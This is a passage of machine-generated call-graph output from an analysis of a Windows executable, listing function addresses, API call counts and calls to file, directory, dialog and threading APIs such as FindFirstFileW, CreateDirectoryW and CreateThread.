ctype 34 API calls 14342->14345 14343->14351 14344 402ee1 30 API calls 14344->14351 14347 408045 14345->14347 14346 401d7a 30 API calls 14346->14351 14348 4042ad ctype 34 API calls 14347->14348 14349 408051 14348->14349 14349->13930 14351->14330 14351->14344 14351->14346 14352 403a9c 29 API calls ctype 14351->14352 14382 4081e7 14351->14382 14352->14351 14354 408252 __EH_prolog 14353->14354 14355 403a76 30 API calls 14354->14355 14356 40825d 14355->14356 14357 408274 14356->14357 14422 40828f 14356->14422 14359 4039df 30 API calls 14357->14359 14360 408280 14359->14360 14360->13930 14362 40209c __EH_prolog 14361->14362 14363 4042d6 ctype 34 API calls 14362->14363 14364 4020c0 14363->14364 14365 4042ad ctype 34 API calls 14364->14365 14366 4020cb 14365->14366 14367 403a9c ctype 29 API calls 14366->14367 14368 4020d3 14367->14368 14368->13930 14370 40806c __EH_prolog 14369->14370 14371 4042d6 ctype 34 API calls 14370->14371 14372 40807e 14371->14372 14373 402170 30 API calls 14372->14373 14374 408093 14373->14374 14375 4080ef 14374->14375 14377 4080de 14374->14377 14379 401db8 30 API calls 14374->14379 14392 403998 14374->14392 14376 403a9c ctype 29 API calls 14375->14376 14378 407f5b 14376->14378 14377->14375 14380 403998 30 API calls 14377->14380 14378->14338 14379->14374 14380->14375 14383 4081f1 __EH_prolog 14382->14383 14384 403a76 30 API calls 14383->14384 14385 4081fd 14384->14385 14386 408227 14385->14386 14387 401ce1 30 API calls 14385->14387 14389 4039df 30 API calls 14386->14389 14388 408217 14387->14388 14390 401ce1 30 API calls 14388->14390 14391 408238 14389->14391 14390->14386 14391->14351 14393 4039a2 __EH_prolog 14392->14393 14394 403a76 30 API calls 14393->14394 14395 4039ad 14394->14395 14396 4039c4 14395->14396 14397 401ce1 30 API calls 14395->14397 14400 4039df 14396->14400 14397->14396 14399 4039d0 14399->14374 14403 4042ff 14400->14403 14404 4039e7 14403->14404 14405 404307 14403->14405 14404->14399 14407 404327 14405->14407 14408 4043cb 14407->14408 14409 40433b 14407->14409 14408->14404 14410 404358 14409->14410 14419 413d3d RaiseException 14409->14419 14412 40437f 14410->14412 14420 413d3d RaiseException 14410->14420 14415 403a76 30 API calls 14412->14415 14417 4043a7 14412->14417 14414 403a9c ctype 29 API calls 14414->14408 14416 40438b 14415->14416 14416->14417 14421 413d3d RaiseException 14416->14421 14417->14414 14419->14410 14420->14412 14421->14417 14423 408299 __EH_prolog 14422->14423 14424 401ce1 30 API calls 14423->14424 14425 4082c0 14424->14425 14428 4082e8 14425->14428 14429 4082f2 __EH_prolog 14428->14429 14430 4042d6 ctype 34 API calls 14429->14430 14431 408319 14430->14431 14434 408334 14431->14434 14435 404327 30 API calls 14434->14435 14438 40834c 14435->14438 14436 4082d0 14436->14357 14437 4081e7 30 API calls 14437->14438 14438->14436 14438->14437 14440 403380 __EH_prolog 14439->14440 14441 402170 30 API calls 14440->14441 14442 40339c 14441->14442 14443 402170 30 API calls 14442->14443 14444 4033b1 14443->14444 14445 402170 30 API calls 14444->14445 14446 402f3e 14445->14446 14446->13943 14448 40311d __EH_prolog 14447->14448 14543 402ee1 14448->14543 14453 403141 14454 401d1b 30 API calls 14453->14454 14455 40314f 14454->14455 14457 403a9c ctype 29 API calls 14455->14457 14456 403158 14552 408f0a 14456->14552 14490 4031c1 14457->14490 14459 403198 14460 4042ad ctype 34 API calls 14459->14460 14461 4031a6 14460->14461 14462 4031c6 14461->14462 14463 4031ab 14461->14463 14464 401ce1 30 API calls 14462->14464 14465 401d1b 30 API calls 14463->14465 14466 4031d2 14464->14466 14465->14455 14467 405d0b 30 API calls 14466->14467 14468 4031de 14467->14468 14612 4049dd 14468->14612 14471 40322a 14473 401c80 30 API calls 14471->14473 14472 4031ea 14739 409569 14472->14739 14475 403237 14473->14475 14647 402685 14475->14647 14481 403a9c ctype 29 API calls 14483 403269 14481->14483 14654 40c231 14483->14654 14690 40bbc9 14483->14690 14487 403284 14489 403a9c ctype 29 API calls 14487->14489 14490->13956 14496 403494 __EH_prolog 14495->14496 14497 403a9c ctype 29 API calls 14496->14497 14498 4034aa 14497->14498 16081 40341c 14498->16081 14501 403a9c ctype 29 API calls 14502 4034cc 14501->14502 14503 403a9c ctype 29 API calls 14502->14503 14504 401581 14503->14504 14504->13490 14504->13491 14506 4034ed __EH_prolog 14505->14506 14507 402170 30 API calls 14506->14507 14508 40351f 14507->14508 14509 402170 30 API calls 14508->14509 14510 403535 14509->14510 14511 402170 30 API calls 14510->14511 14512 40354b 14511->14512 14513 402170 30 API calls 14512->14513 14514 403564 14513->14514 16091 4035a6 14514->16091 14517 402170 30 API calls 14518 403589 14517->14518 14518->13950 16110 4148be 14519->16110 14522 413243 14522->13955 14523 413248 GetLastError 14524 413252 14523->14524 14524->13955 14526 4131e9 CloseHandle 14525->14526 14528 402fd0 14525->14528 14527 4131f4 GetLastError 14526->14527 14526->14528 14527->14528 14528->13965 14530 4030a7 __EH_prolog 14529->14530 14531 401d7a 30 API calls 14530->14531 14532 4030bc 14531->14532 16140 40620b 14532->16140 14536 4030d4 14537 40602f 33 API calls 14536->14537 14538 4030df 14537->14538 16160 406049 14538->16160 14541 403a9c ctype 29 API calls 14542 4030f5 ShowWindow 14541->14542 14542->13976 14544 402170 30 API calls 14543->14544 14545 402ef5 14544->14545 14546 405841 14545->14546 14547 40584b __EH_prolog 14546->14547 14747 4055de 14547->14747 14550 40551a FindClose 14551 40313d 14550->14551 14551->14453 14551->14456 14553 408f14 __EH_prolog 14552->14553 14554 403a76 30 API calls 14553->14554 14555 408f31 14554->14555 14556 408f43 14555->14556 14869 409184 14555->14869 14558 402170 30 API calls 14556->14558 14559 408f7a 14558->14559 14560 402170 30 API calls 14559->14560 14561 408f91 14560->14561 14562 402170 30 API calls 14561->14562 14563 408fa8 14562->14563 14564 40906f 14563->14564 14788 404e76 14563->14788 14843 408a3b 14564->14843 14568 408fd3 GetLastError 14571 403a9c ctype 29 API calls 14568->14571 14569 40900e 14572 401e3a 30 API calls 14569->14572 14575 408fe3 14571->14575 14577 40901d 14572->14577 14573 4090a1 14578 403a9c ctype 29 API calls 14573->14578 14574 4090d5 14576 402634 30 API calls 14574->14576 14580 403a9c ctype 29 API calls 14575->14580 14581 4090e4 14576->14581 14582 401d7a 30 API calls 14577->14582 14579 4090a9 14578->14579 14583 403a9c ctype 29 API calls 14579->14583 14584 408feb 14580->14584 14585 403998 30 API calls 14581->14585 14586 40902a 14582->14586 14587 4090b1 14583->14587 14588 403a9c ctype 29 API calls 14584->14588 14589 4090f3 14585->14589 14590 403a9c ctype 29 API calls 14586->14590 14592 403a9c ctype 29 API calls 14587->14592 14611 408ff3 14588->14611 14593 403a9c ctype 29 API calls 14589->14593 14591 409036 14590->14591 14594 401e19 30 API calls 14591->14594 14592->14611 14600 4090ff 14593->14600 14595 409046 14594->14595 14598 401d7a 30 API calls 14595->14598 14596 409135 14599 403a9c ctype 29 API calls 14596->14599 14597 402634 30 API calls 14597->14600 14601 409053 14598->14601 14602 409152 14599->14602 14600->14596 14600->14597 14603 403998 30 API calls 14600->14603 14608 403a9c ctype 29 API calls 14600->14608 14604 403a9c ctype 29 API calls 14601->14604 14605 403a9c ctype 29 API calls 14602->14605 14603->14600 14606 40905f 14604->14606 14607 40915a 14605->14607 14829 4092e9 14606->14829 14610 403a9c ctype 29 API calls 14607->14610 14608->14600 14610->14611 14611->14459 14613 4049e7 __EH_prolog 14612->14613 14614 401c80 30 API calls 14613->14614 14619 4049f6 14614->14619 14615 401ce1 30 API calls 14617 404a56 14615->14617 14618 404a6d GetLastError 14617->14618 14624 404bb2 14617->14624 14637 401e3a 30 API calls 14617->14637 14639 404b41 14617->14639 14643 401d7a 30 API calls 14617->14643 14646 403a9c ctype 29 API calls 14617->14646 15441 40499c 14617->15441 14618->14617 14620 404aea 14618->14620 14619->14615 14630 404a38 14619->14630 14622 402ee1 30 API calls 14620->14622 14621 401d7a 30 API calls 14638 404b4e 14621->14638 14623 404af2 14622->14623 14627 405841 37 API calls 14623->14627 14628 403a9c ctype 29 API calls 14624->14628 14625 403a9c ctype 29 API calls 14626 4031e6 14625->14626 14626->14471 14626->14472 14629 404b01 14627->14629 14628->14630 14631 404b05 14629->14631 14632 404b35 14629->14632 14630->14625 14635 403a9c ctype 29 API calls 14631->14635 14634 403a9c ctype 29 API calls 14632->14634 14633 401e3a 30 API calls 14633->14638 14634->14639 14636 404b1d 14635->14636 14640 403a9c ctype 29 API calls 14636->14640 14637->14617 14638->14624 14638->14633 14641 40499c 34 API calls 14638->14641 14645 403a9c ctype 29 API calls 14638->14645 14639->14621 14642 404b25 14640->14642 14641->14638 14644 403a9c ctype 29 API calls 14642->14644 14643->14617 14644->14626 14645->14638 14646->14617 14648 401d7a 30 API calls 14647->14648 14649 4026ac 14648->14649 14650 401d7a 30 API calls 14649->14650 14651 4026d8 14650->14651 14652 405d0b 30 API calls 14651->14652 14653 4026df 14652->14653 14653->14481 14655 40bdf7 14654->14655 14656 40be1c 14655->14656 14657 40be78 14655->14657 14659 403a76 30 API calls 14655->14659 14668 40be5b 14655->14668 14670 40bf45 14655->14670 14677 40c0f3 14655->14677 14678 40c059 14655->14678 14679 40ca4c 62 API calls 14655->14679 14680 40c0b5 14655->14680 14682 40c156 14655->14682 15461 40c73a 14655->15461 15465 40ad19 14655->15465 15577 40c5e8 14655->15577 14658 40c380 34 API calls 14656->14658 15451 40c380 14657->15451 14660 40be3c 14658->14660 14659->14655 14661 4042d6 ctype 34 API calls 14660->14661 14668->14487 14671 40c380 34 API calls 14670->14671 14672 40bf76 14671->14672 14681 40c380 34 API calls 14677->14681 14683 40c380 34 API calls 14678->14683 14679->14655 14685 40c380 34 API calls 14680->14685 14684 40c083 14681->14684 14687 40c380 34 API calls 14682->14687 14683->14684 14685->14684 14687->14684 14700 40bbd3 __EH_prolog 14690->14700 14691 40bd4e 14692 40bd90 14691->14692 14693 40bd63 14691->14693 14699 403a76 30 API calls 14692->14699 14695 4042d6 ctype 34 API calls 14693->14695 14696 40bd76 14695->14696 14697 40c46d 35 API calls 14697->14700 14727 40bdb4 14699->14727 14700->14691 14700->14697 14701 40c413 30 API calls 14700->14701 14702 4042ad 34 API calls ctype 14700->14702 14716 40bc23 14700->14716 16056 40c30e 14700->16056 16062 40c281 14700->16062 14701->14700 14702->14700 14716->14487 14727->14716 14740 409573 __EH_prolog 14739->14740 14741 40602f 33 API calls 14740->14741 14742 409585 14741->14742 16067 4094f6 14742->16067 14748 4055e8 __EH_prolog 14747->14748 14749 40551a FindClose 14748->14749 14750 4055f6 14749->14750 14751 40562c 14750->14751 14752 405607 FindFirstFileW 14750->14752 14753 40562e 14750->14753 14751->14550 14752->14751 14755 40561e 14752->14755 14754 401c80 30 API calls 14753->14754 14756 405639 AreFileApisANSI 14754->14756 14765 4056a6 14755->14765 14758 403d04 31 API calls 14756->14758 14759 405654 FindFirstFileA 14758->14759 14760 403a9c ctype 29 API calls 14759->14760 14761 40566e 14760->14761 14762 403a9c ctype 29 API calls 14761->14762 14763 40567a 14762->14763 14763->14751 14769 405705 14763->14769 14766 4056e4 14765->14766 14767 401d1b 30 API calls 14766->14767 14768 405701 14767->14768 14768->14751 14770 40570f __EH_prolog 14769->14770 14781 4052b2 14770->14781 14775 401d7a 30 API calls 14776 405794 14775->14776 14777 403a9c ctype 29 API calls 14776->14777 14778 40579c 14777->14778 14779 403a9c ctype 29 API calls 14778->14779 14780 4057a4 14779->14780 14780->14751 14782 4052c9 14781->14782 14783 40243e 30 API calls 14782->14783 14784 4052d8 AreFileApisANSI 14783->14784 14785 4057b5 14784->14785 14786 403b9c 31 API calls 14785->14786 14787 405787 14786->14787 14787->14775 14789 404e80 __EH_prolog 14788->14789 14790 404ea2 14789->14790 14791 404f2d 14789->14791 14793 404eb7 GetFullPathNameW 14790->14793 14795 402170 30 API calls 14790->14795 14792 40243e 30 API calls 14791->14792 14794 404f40 14792->14794 14798 404ed8 14793->14798 14877 4048ff 14794->14877 14795->14793 14798->14568 14798->14569 14801 403a9c ctype 29 API calls 14802 404f76 14801->14802 14803 404f8b 14802->14803 14804 404f7b 14802->14804 14892 405352 14803->14892 14806 403a9c ctype 29 API calls 14804->14806 14806->14798 14810 403a9c ctype 29 API calls 14811 404fb3 14810->14811 14898 405331 14811->14898 14814 404818 32 API calls 14815 404fd0 14814->14815 14816 403a9c ctype 29 API calls 14815->14816 14817 404fdc 14816->14817 14818 402634 30 API calls 14817->14818 14819 404ff1 14818->14819 14820 401d7a 30 API calls 14819->14820 14821 404ffd 14820->14821 14822 403a9c ctype 29 API calls 14821->14822 14823 405005 14822->14823 14830 4092f3 __EH_prolog 14829->14830 14831 401d7a 30 API calls 14830->14831 14832 409308 14831->14832 14833 402634 30 API calls 14832->14833 14834 409315 14833->14834 14835 405841 37 API calls 14834->14835 14836 409324 14835->14836 14837 403a9c ctype 29 API calls 14836->14837 14838 409338 14837->14838 14839 409352 14838->14839 14914 413d3d RaiseException 14838->14914 14841 4042d6 ctype 34 API calls 14839->14841 14842 40935a 14841->14842 14842->14564 14856 408a45 __EH_prolog 14843->14856 14844 401d7a 30 API calls 14844->14856 14845 408cfb 14847 405e34 VariantClear 14845->14847 14846 408e75 14849 405e34 VariantClear 14846->14849 14854 408a61 14847->14854 14849->14854 14850 408ce8 15025 4038c2 14850->15025 14853 4038c2 29 API calls 14853->14856 14854->14573 14854->14574 14855 408ea0 30 API calls 14855->14856 14856->14844 14856->14845 14856->14846 14856->14850 14856->14853 14856->14854 14856->14855 14858 408d0e 14856->14858 14861 408d55 14856->14861 14862 408dae 14856->14862 14866 408e06 14856->14866 14867 4093f0 30 API calls 14856->14867 14915 408902 14856->14915 14928 405e34 14856->14928 14932 40836d 14856->14932 14957 408524 14856->14957 15021 40848c 14856->15021 14859 4038c2 29 API calls 14858->14859 14859->14854 14864 4038c2 29 API calls 14861->14864 14865 4038c2 29 API calls 14862->14865 14864->14854 14865->14854 14868 4038c2 29 API calls 14866->14868 14867->14856 14868->14854 14870 40918e __EH_prolog 14869->14870 14871 402170 30 API calls 14870->14871 14872 4091c1 14871->14872 15438 40590e 14872->15438 14875 402170 30 API calls 14876 4091e2 14875->14876 14876->14556 14878 404909 __EH_prolog 14877->14878 14879 401c80 30 API calls 14878->14879 14880 40491c AreFileApisANSI 14879->14880 14881 403d04 31 API calls 14880->14881 14882 404936 14881->14882 14883 403a9c ctype 29 API calls 14882->14883 14884 40493e 14883->14884 14885 404df9 14884->14885 14886 404e26 GetFullPathNameA 14885->14886 14887 404e1e 14885->14887 14889 404e45 14886->14889 14888 40243e 30 API calls 14887->14888 14888->14886 14890 404e5b lstrlenA 14889->14890 14891 404e50 14889->14891 14890->14891 14891->14801 14901 40536e 14892->14901 14895 404818 AreFileApisANSI 14896 403b9c 31 API calls 14895->14896 14897 404839 14896->14897 14897->14810 14899 40536e 30 API calls 14898->14899 14900 404fc2 14899->14900 14900->14814 14903 405378 __EH_prolog 14901->14903 14902 4053ac 14905 40243e 30 API calls 14902->14905 14903->14902 14904 4053a1 14903->14904 14906 403d24 30 API calls 14904->14906 14907 4053bf 14905->14907 14908 404f99 14906->14908 14909 40243e 30 API calls 14907->14909 14908->14895 14910 4053cc 14909->14910 14911 403d24 30 API calls 14910->14911 14912 4053fa 14911->14912 14913 403a9c ctype 29 API calls 14912->14913 14913->14908 14914->14839 14916 40890c __EH_prolog 14915->14916 14917 408927 14916->14917 14918 40894b 14916->14918 14919 403a76 30 API calls 14917->14919 14921 403a76 30 API calls 14918->14921 14923 40892e 14918->14923 14919->14923 14920 408524 86 API calls 14922 4089b8 14920->14922 14924 408957 14921->14924 14922->14856 14923->14920 15032 406434 14924->15032 14927 408994 GetLastError 14927->14922 14931 405e39 14928->14931 14929 405e71 14929->14856 14930 405e5a VariantClear 14930->14856 14931->14929 14931->14930 14933 408377 __EH_prolog 14932->14933 14934 4083a3 14933->14934 14935 4083b6 14933->14935 14936 405e34 VariantClear 14934->14936 14937 4083cc 14935->14937 14938 4083bd 14935->14938 14939 4083af 14936->14939 14941 4083ca 14937->14941 14942 40846a 14937->14942 14940 401d1b 30 API calls 14938->14940 14939->14856 14940->14941 14944 405e34 VariantClear 14941->14944 14943 405e34 VariantClear 14942->14943 14943->14939 14945 4083ed 14944->14945 14945->14939 14946 401d7a 30 API calls 14945->14946 14947 4083fd 14946->14947 14948 408421 14947->14948 14949 40842c 14947->14949 14950 40844f 14947->14950 14952 405e34 VariantClear 14948->14952 14953 401db8 30 API calls 14949->14953 14950->14948 14951 40843f 14950->14951 14955 405e34 VariantClear 14951->14955 14952->14939 14954 408435 14953->14954 15035 407d25 14954->15035 14955->14939 14960 40852e __EH_prolog 14957->14960 15043 40455d 14960->15043 14961 402170 30 API calls 14963 408570 14961->14963 14962 4085c4 14964 4085df 14962->14964 14977 4085ef 14962->14977 14963->14962 14968 401e19 30 API calls 14963->14968 14965 4039df 30 API calls 14964->14965 14983 4085ea 14965->14983 14966 40863c 14966->14983 15012 408648 14966->15012 15086 4042eb 14966->15086 14969 4085ab 14968->14969 14971 401d7a 30 API calls 14969->14971 14974 4085b8 14971->14974 14972 4042ad ctype 34 API calls 14976 408742 14972->14976 14978 403a9c ctype 29 API calls 14974->14978 14975 4039df 30 API calls 14975->14977 14979 403a9c ctype 29 API calls 14976->14979 14977->14966 14977->14975 15079 4088ce 14977->15079 15083 404407 14977->15083 14978->14962 14980 40874a 14979->14980 14981 403a9c ctype 29 API calls 14980->14981 14982 408752 14981->14982 14982->14856 14984 40876b 14983->14984 14989 4087a1 14983->14989 14983->15012 15047 4065b2 14983->15047 15053 40df69 14983->15053 15059 40d1ab 14983->15059 14985 4042ad ctype 34 API calls 14984->14985 14986 408788 14985->14986 14987 403a9c ctype 29 API calls 14986->14987 14988 408790 14987->14988 14992 403a9c ctype 29 API calls 14988->14992 14990 4087f8 14989->14990 14993 401d1b 30 API calls 14989->14993 14989->15012 14991 405e34 VariantClear 14990->14991 14994 408804 14991->14994 14992->14982 14993->14990 14995 408879 14994->14995 14996 40881d 14994->14996 14997 4088ce 5 API calls 14995->14997 14998 401c80 30 API calls 14996->14998 14999 408884 14997->14999 15000 40882b 14998->15000 15002 407d82 35 API calls 14999->15002 15001 401c80 30 API calls 15000->15001 15003 408838 15001->15003 15004 4088a0 15002->15004 15089 407d82 15003->15089 15006 401d7a 30 API calls 15004->15006 15008 4088ad 15006->15008 15010 403a9c ctype 29 API calls 15008->15010 15009 401d7a 30 API calls 15011 40885c 15009->15011 15010->15012 15013 403a9c ctype 29 API calls 15011->15013 15012->14972 15014 408864 15013->15014 15015 403a9c ctype 29 API calls 15014->15015 15022 408496 __EH_prolog 15021->15022 15023 405e34 VariantClear 15022->15023 15024 408511 15023->15024 15024->14856 15026 403a9c ctype 29 API calls 15025->15026 15027 4038cd 15026->15027 15028 403a9c ctype 29 API calls 15027->15028 15029 4038d5 15028->15029 15030 403a9c ctype 29 API calls 15029->15030 15031 4038dd 15030->15031 15031->14854 15033 405b6d 35 API calls 15032->15033 15034 406440 15033->15034 15034->14923 15034->14927 15036 407d3a 15035->15036 15039 4021c4 15036->15039 15040 402208 15039->15040 15041 4021d8 15039->15041 15040->14951 15042 402170 30 API calls 15041->15042 15042->15040 15046 40456d 15043->15046 15044 401e19 30 API calls 15045 404592 15044->15045 15045->14961 15046->15044 15048 4065c2 15047->15048 15049 4065bb 15047->15049 15099 405ace SetFilePointer 15048->15099 15049->14983 15054 40df7a 15053->15054 15058 4065b2 3 API calls 15054->15058 15055 40df8e 15056 40df9e 15055->15056 15106 40dd8b 15055->15106 15056->14983 15058->15055 15060 40d1b5 __EH_prolog 15059->15060 15061 40df69 34 API calls 15060->15061 15062 40d208 15061->15062 15063 40d20e 15062->15063 15064 40d22f 15062->15064 15140 40d2cf 15063->15140 15136 40f8c3 15064->15136 15068 40d261 15146 40f4d8 15068->15146 15069 40d242 15070 40d2cf 34 API calls 15069->15070 15078 40d21a 15070->15078 15078->14983 15081 4088d9 15079->15081 15082 4088f6 15079->15082 15080 403b4f ctype 5 API calls 15080->15081 15081->15080 15081->15082 15082->14977 15084 4042ff 30 API calls 15083->15084 15085 40440f 15084->15085 15085->14977 15369 40ba4f 15086->15369 15087 4042fc 15087->14983 15090 407d8c __EH_prolog 15089->15090 15403 407dd5 15090->15403 15093 40235e 30 API calls 15094 407db0 15093->15094 15095 401ce1 30 API calls 15094->15095 15096 407dbb 15095->15096 15097 403a9c ctype 29 API calls 15096->15097 15098 407dc3 15097->15098 15098->15009 15100 405b01 15099->15100 15101 405af7 GetLastError 15099->15101 15102 406534 15100->15102 15101->15100 15103 406538 15102->15103 15104 40653b GetLastError 15102->15104 15103->15049 15105 406545 15104->15105 15105->15049 15107 40dd95 __EH_prolog 15106->15107 15118 40776f 15107->15118 15109 40ddc1 15109->15056 15110 40ddae 15110->15109 15121 4076d5 15110->15121 15112 40decb 15113 403a9c ctype 29 API calls 15112->15113 15113->15109 15114 40dde7 ctype 15114->15112 15115 40ded0 15114->15115 15127 406505 15114->15127 15117 4065b2 3 API calls 15115->15117 15117->15112 15132 407723 15118->15132 15122 4076e2 15121->15122 15123 407716 15121->15123 15124 403a76 30 API calls 15122->15124 15126 4076ed ctype 15122->15126 15123->15114 15124->15126 15125 403a9c ctype 29 API calls 15125->15123 15126->15125 15128 405ba8 ReadFile 15127->15128 15129 40651d 15128->15129 15130 406534 GetLastError 15129->15130 15131 406530 15130->15131 15131->15114 15134 407737 15132->15134 15133 407766 15133->15110 15134->15133 15135 406505 ReadFile GetLastError 15134->15135 15135->15134 15137 40f8cd __EH_prolog 15136->15137 15172 40f648 15137->15172 15141 40d2d9 __EH_prolog 15140->15141 15142 4042d6 ctype 34 API calls 15141->15142 15143 40d2fd 15142->15143 15144 4042ad ctype 34 API calls 15143->15144 15145 40d308 15144->15145 15145->15078 15147 4042d6 ctype 34 API calls 15146->15147 15148 40f4eb 15147->15148 15173 40f652 __EH_prolog 15172->15173 15212 40d377 15173->15212 15177 40f694 15178 40db47 RaiseException 15177->15178 15179 40f6c9 15177->15179 15178->15179 15186 40d23b 15179->15186 15211 4065b2 3 API calls 15179->15211 15180 40f720 15181 4076d5 30 API calls 15180->15181 15180->15186 15182 40f745 15181->15182 15186->15068 15186->15069 15211->15180 15213 40d3d2 34 API calls 15212->15213 15214 40d37f 15213->15214 15215 4042d6 ctype 34 API calls 15214->15215 15216 40d38a 15215->15216 15217 4042d6 ctype 34 API calls 15216->15217 15218 40d395 15217->15218 15219 4042d6 ctype 34 API calls 15218->15219 15220 40d3a0 15219->15220 15221 4042d6 ctype 34 API calls 15220->15221 15222 40d3ab 15221->15222 15223 4042d6 ctype 34 API calls 15222->15223 15224 40d3b6 15223->15224 15224->15177 15276 40db47 15224->15276 15277 413d3d RaiseException 15276->15277 15278 40db5f 15277->15278 15279 40db6f 15278->15279 15280 40db47 RaiseException 15278->15280 15279->15177 15280->15279 15372 40ba66 15369->15372 15370 40ba9e 15370->15087 15372->15370 15373 403a9c ctype 29 API calls 15372->15373 15374 40a011 15372->15374 15373->15372 15375 40a01b __EH_prolog 15374->15375 15376 4042ad ctype 34 API calls 15375->15376 15377 40a036 15376->15377 15378 4042ad ctype 34 API calls 15377->15378 15379 40a045 15378->15379 15380 4042d6 ctype 34 API calls 15379->15380 15381 40a05f 15380->15381 15382 4042ad ctype 34 API calls 15381->15382 15383 40a06a 15382->15383 15384 4042d6 ctype 34 API calls 15383->15384 15385 40a081 15384->15385 15386 4042ad ctype 34 API calls 15385->15386 15387 40a08c 15386->15387 15392 407868 15387->15392 15393 407880 15392->15393 15394 407887 15392->15394 15395 413260 SetEvent GetLastError 15393->15395 15396 407891 15394->15396 15397 407896 15394->15397 15395->15394 15398 413210 WaitForSingleObject 15396->15398 15399 4131e0 ctype CloseHandle GetLastError 15397->15399 15398->15397 15400 40789d 15399->15400 15401 4131e0 ctype CloseHandle GetLastError 15400->15401 15402 4078a5 15401->15402 15405 407ddf __EH_prolog 15403->15405 15404 407eb5 15406 407ebe 15404->15406 15407 407ecf 15404->15407 15408 401e19 30 API calls 15405->15408 15411 407e63 15405->15411 15428 407cd4 15406->15428 15412 402634 30 API calls 15407->15412 15409 407e1b 15408->15409 15413 403b4f ctype 5 API calls 15409->15413 15411->15404 15414 407e8e 15411->15414 15427 407da4 15412->15427 15415 407e28 15413->15415 15416 401e3a 30 API calls 15414->15416 15417 403a9c ctype 29 API calls 15415->15417 15418 407e9a 15416->15418 15419 407e39 15417->15419 15420 402634 30 API calls 15418->15420 15419->15411 15421 407e3e 15419->15421 15423 407e5e 15420->15423 15422 401e3a 30 API calls 15421->15422 15424 407e4a 15422->15424 15425 403a9c ctype 29 API calls 15423->15425 15426 402634 30 API calls 15424->15426 15425->15427 15426->15423 15427->15093 15429 407cde __EH_prolog 15428->15429 15430 401ce1 30 API calls 15429->15430 15431 407cf1 15430->15431 15432 407d25 30 API calls 15431->15432 15433 407d00 15432->15433 15434 401ce1 30 API calls 15433->15434 15435 407d0b 15434->15435 15436 403a9c ctype 29 API calls 15435->15436 15437 407d13 15436->15437 15437->15427 15439 402170 30 API calls 15438->15439 15440 405925 15439->15440 15440->14875 15442 4049ab 15441->15442 15443 4049cd CreateDirectoryW 15441->15443 15444 4048ff 32 API calls 15442->15444 15443->14617 15445 4049b6 15444->15445 15450 40498d CreateDirectoryA 15445->15450 15447 4049bd 15448 403a9c ctype 29 API calls 15447->15448 15449 4049c7 15448->15449 15449->14617 15450->15447 15452 40c38a __EH_prolog 15451->15452 15462 40c763 15461->15462 15591 40c902 15462->15591 15466 40ad23 __EH_prolog 15465->15466 15787 40d7cc 15466->15787 15578 40c5f2 __EH_prolog 15577->15578 15579 403a76 30 API calls 15578->15579 15594 40c905 15591->15594 16057 40c318 __EH_prolog 16056->16057 16058 40c366 16057->16058 16059 404327 30 API calls 16057->16059 16058->14700 16063 40c290 16062->16063 16065 40c296 16062->16065 16063->14700 16065->16063 16066 413d3d RaiseException 16065->16066 16066->16063 16068 409500 __EH_prolog 16067->16068 16069 401ce1 30 API calls 16068->16069 16070 409513 16069->16070 16071 401c80 30 API calls 16070->16071 16072 409524 16071->16072 16073 401e56 30 API calls 16072->16073 16074 409537 16073->16074 16075 403a9c ctype 29 API calls 16074->16075 16076 409543 16075->16076 16077 401ce1 30 API calls 16076->16077 16078 40954f 16077->16078 16082 403426 __EH_prolog 16081->16082 16083 4042d6 ctype 34 API calls 16082->16083 16084 403452 16083->16084 16085 4042ad ctype 34 API calls 16084->16085 16086 40345d 16085->16086 16087 4042d6 ctype 34 API calls 16086->16087 16088 403471 16087->16088 16089 4042ad ctype 34 API calls 16088->16089 16090 40347c 16089->16090 16090->14501 16092 4035b0 __EH_prolog 16091->16092 16093 402170 30 API calls 16092->16093 16094 4035dd 16093->16094 16101 403664 16094->16101 16098 403614 16099 403570 16098->16099 16108 413d3d RaiseException 16098->16108 16099->14517 16109 413310 InitializeCriticalSection 16101->16109 16103 4035f1 16104 4132a0 CreateEventA 16103->16104 16105 4132c1 GetLastError 16104->16105 16106 4132be 16104->16106 16107 4132cb 16105->16107 16106->16098 16107->16098 16108->16099 16109->16103 16111 416efc 30 API calls 16110->16111 16113 4148ce 16111->16113 16112 414911 16114 413f9f ctype 29 API calls 16112->16114 16113->16112 16115 4148dc CreateThread 16113->16115 16116 414917 16114->16116 16117 413239 16115->16117 16118 414909 GetLastError 16115->16118 16116->16117 16120 416e77 16116->16120 16117->14522 16117->14523 16118->16112 16137 416ef3 16120->16137 16123 416eb0 16125 416eea 35 API calls 16123->16125 16124 416e99 16126 416ec0 16124->16126 16128 416ea3 16124->16128 16127 416eb5 16125->16127 16129 416edd 16126->16129 16132 416ed0 16126->16132 16127->16117 16131 416eea 35 API calls 16128->16131 16130 416eea 35 API calls 16129->16130 16133 416ee2 16130->16133 16134 416ea8 16131->16134 16135 416eea 35 API calls 16132->16135 16133->16117 16134->16117 16136 416ed5 16135->16136 16136->16117 16138 415523 35 API calls 16137->16138 16139 416e7d 16138->16139 16139->16123 16139->16124 16141 406215 __EH_prolog 16140->16141 16142 406240 16141->16142 16143 406226 DialogBoxParamW 16141->16143 16144 40243e 30 API calls 16142->16144 16150 4030ca 16143->16150 16145 406253 16144->16145 16146 40629a DialogBoxParamA 16145->16146 16147 401c80 30 API calls 16145->16147 16148 403a9c ctype 29 API calls 16146->16148 16149 406269 16147->16149 16148->16150 16151 401a18 31 API calls 16149->16151 16159 413210 WaitForSingleObject 16150->16159 16152 406278 16151->16152 16153 4052f9 30 API calls 16152->16153 16154 406285 16153->16154 16155 403a9c ctype 29 API calls 16154->16155 16156 40628d 16155->16156 16157 403a9c ctype 29 API calls 16156->16157 16158 406295 16157->16158 16158->16146 16159->14536 16161 406053 __EH_prolog 16160->16161 16162 406074 16161->16162 16163 406065 SetWindowTextW 16161->16163 16164 401c80 30 API calls 16162->16164 16171 4030ed 16163->16171 16165 40607c 16164->16165 16166 403d04 31 API calls 16165->16166 16167 40608b SetWindowTextA 16166->16167 16168 403a9c ctype 29 API calls 16167->16168 16169 4060a1 16168->16169 16170 403a9c ctype 29 API calls 16169->16170 16170->16171 16171->14541 16173 4023a8 16172->16173 16175 4023c1 16173->16175 16176 402559 16173->16176 16175->13995 16177 402569 16176->16177 16178 4021c4 30 API calls 16177->16178 16179 402577 ctype 16178->16179 16179->16175 16181 403f46 __EH_prolog 16180->16181 16182 40243e 30 API calls 16181->16182 16183 403f69 16182->16183 16184 403f9a 16183->16184 16187 401ee5 30 API calls 16183->16187 16185 403d24 30 API calls 16184->16185 16186 403fa6 16185->16186 16188 403a9c ctype 29 API calls 16186->16188 16187->16183 16189 403fae 16188->16189 16189->14043 16191 4040c8 __EH_prolog 